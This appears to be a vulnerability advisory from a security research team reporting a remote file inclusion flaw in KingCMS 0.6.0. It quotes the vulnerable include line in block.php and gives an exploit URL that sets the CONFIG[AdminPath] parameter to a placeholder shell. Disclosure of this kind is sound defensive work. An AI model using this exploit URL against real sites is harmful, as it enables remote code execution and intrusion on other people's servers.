########################## Securitylab.ir ######################## # Application Info: # Name: Kingcms # Version: 0.6.0 # Website: http://sourceforge.net/projects/kingcms ################################################################# # Discoverd By: Securitylab.ir # Website: http://securitylab.ir # Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir ################################################################# # Vulnerability Info: # Type: Remote File Inclusion Vulnerability # Risk: High #=========================================================== # block.php # ... # require_once($CONFIG['AdminPath'] . "/include/engine/content/contentvariable.php"); # ... # # http://site.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL] #=========================================================== ################################################################# # Securitylab Security Research Team ###################################################################